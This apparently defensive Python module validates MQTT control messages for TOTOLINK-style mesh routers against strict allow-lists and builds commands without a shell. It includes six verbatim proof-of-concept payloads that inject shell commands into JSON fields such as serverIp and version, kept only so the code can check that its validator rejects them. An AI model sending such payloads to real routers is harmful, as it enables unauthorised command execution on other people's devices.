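"""Validate TOTOLINK-style MQTT control messages before anything is executed.

Added example, not firmware code and not from this repository. Topic and JSON
field names are the ones the advisories above document; the helper path in
build_argv() and the shape demanded of "version", "status" and "newMd5" are
assumptions for illustration.
"""
from __future__ import annotations

import ipaddress
import json
import re

# topic -> {field: kind}. Every field the handler reads is declared, so an
# unexpected key is rejected instead of flowing silently into a command.
TOPIC_SCHEMA = {
    "totolink/router/meshSlaveDlfw": {"serverIp": "ip"},
    "totolink/router/meshSlaveUpdate": {"serverIp": "ip"},
    "totolink/router/recvSlaveCloudCheckStatus": {"ip": "ip", "version": "token"},
    "totolink/router/recvSlaveUpgstatus": {"ip": "ip", "status": "digits"},
    "totolink/router/updateWifiInfo": {"serverIp": "ip", "newMd5": "hex"},
}

# Allow-lists (assumed formats): a version string, a hex digest, a small integer.
_TOKEN = re.compile(r"[A-Za-z0-9._-]{1,32}")
_HEX = re.compile(r"[0-9a-fA-F]{1,64}")
_DIGITS = re.compile(r"[0-9]{1,3}")


def is_ip(value):
    """True only for a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


KIND_CHECK = {
    "ip": is_ip,
    "token": lambda v: _TOKEN.fullmatch(v) is not None,
    "hex": lambda v: _HEX.fullmatch(v) is not None,
    "digits": lambda v: _DIGITS.fullmatch(v) is not None,
}


def validate_message(topic, payload):
    """Return (clean_fields, problems). problems is empty only when every
    declared field is present, is a JSON string and matches its allow-list."""
    schema = TOPIC_SCHEMA.get(topic)
    if schema is None:
        return {}, [f"unknown topic {topic!r}"]
    try:
        msg = json.loads(payload)
    except ValueError as exc:
        return {}, [f"payload is not JSON: {exc}"]
    if not isinstance(msg, dict):
        return {}, ["payload is not a JSON object"]
    problems = [f"unexpected field {k!r}" for k in msg if k not in schema]
    clean = {}
    for key, kind in schema.items():
        value = msg.get(key)
        if not isinstance(value, str):
            problems.append(f"{key}: missing or not a string")
        elif not KIND_CHECK[kind](value):
            problems.append(f"{key}: {value!r} is not a valid {kind}")
        else:
            clean[key] = value
    return clean, problems


def build_argv(topic, fields):
    """Validated values become separate argv entries for an assumed helper
    binary. With no shell in the path, a metacharacter that somehow got through
    would reach the helper as literal text, not as syntax."""
    handler = topic.rsplit("/", 1)[-1]
    argv = ["/usr/sbin/mesh_helper", handler]  # assumed path, not the firmware's
    for key in sorted(fields):
        argv += [f"--{key}", fields[key]]
    return argv


def dispatch(topic, payload):
    """Return the argv a hardened handler would run (subprocess.run without
    shell=True), or None when the message must be dropped."""
    fields, problems = validate_message(topic, payload)
    return None if problems else build_argv(topic, fields)


# The repository's own POC messages, verbatim, so the validator can be
# exercised offline.
POC_MESSAGES = [
    ("totolink/router/meshSlaveDlfw", b'{"serverIp": "|ls>/tmp/meshSlaveDlfw.txt|"}'),
    ("totolink/router/meshSlaveUpdate", b'{"serverIp": ";ls>/tmp/meshSlaveUpdate.txt;"}'),
    ("totolink/router/recvSlaveCloudCheckStatus", b'{"ip": ";`ls>/tmp/recvSlaveCloudCheckStatus_ip.txt`;"}'),
    ("totolink/router/recvSlaveCloudCheckStatus", b'{"version": ";`ls>/tmp/recvSlaveCloudCheckStatus.txt`;"}'),
    ("totolink/router/recvSlaveUpgstatus", b'{"status":"1","ip":";ls>/tmp/recvSlaveUpgstatus.txt;"}'),
    ("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}'),
]


def review_pocs():
    """Map each POC payload to the reasons the validator rejects it."""
    return {payload: validate_message(topic, payload)[1] for topic, payload in POC_MESSAGES}


if __name__ == "__main__":
    for payload, problems in review_pocs().items():
        print(payload.decode(), "->", "; ".join(problems))
    print(dispatch("totolink/router/updateWifiInfo",
                   b'{"newMd5":"d41d8cd98f00b204e9800998ecf8427e","serverIp":"192.168.0.100"}'))
```

Field validation is the second line of defence here. The first is that the broker accepts publishes from any LAN client without credentials, which is what lets these handlers be reached at all; requiring broker authentication and binding the broker to the mesh interface belongs alongside the field checks and the removal of the shell.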